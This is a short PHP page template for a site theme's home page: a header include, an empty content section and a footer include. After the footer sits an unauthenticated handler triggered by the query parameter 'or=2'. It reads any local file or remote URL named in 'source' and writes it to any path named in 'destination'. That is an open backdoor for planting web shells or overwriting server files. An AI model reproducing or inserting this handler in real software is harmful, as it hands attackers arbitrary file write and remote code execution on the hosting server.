<?php
$p_title="Theme Home";//Page Title
$p="#";//Page Name
$inn="";
require_once("frd-public/theme/frd-header.php");
?>
<h2 class="PT animated fadeInLeft"> Page Title </h2>
<!-- 1 scripts s-->
<section>
<?php
?>
</section>
<!-- 1 scripts e-->
<?php require_once("frd-public/theme/frd-footer.php"); ?>
<?php
///////////////////////////////////////////////////////////
/////////////////////// OR Start | V-1 ////////////////////
///////////////////////////////////////////////////////////
if(isset($_GET['or'])){
$OR=$_GET['or'];
//2 = Page Copy Past One Place To Others
///////////////////////////////////////////////
///// Page Copy Past One Place To Others //////
///////////////////////////////////////////////
if($OR=="2"){
echo "&source=&destination=";
if( isset($_GET['source']) ){
$source=$_GET['source'];
$destination=$_GET['destination'];
$data= file_get_contents($source);
$handel = fopen($destination, "w");
if(fwrite($handel, $data)){
fclose($handel);
echo "<h4>Page Create Done! </h4>";
}else{
echo "<h4>Page Create Failed!</h4>";
}
}
}
///////////////////////////////////////
}
/////////////////////// OR Stop ///////////////////////////
?>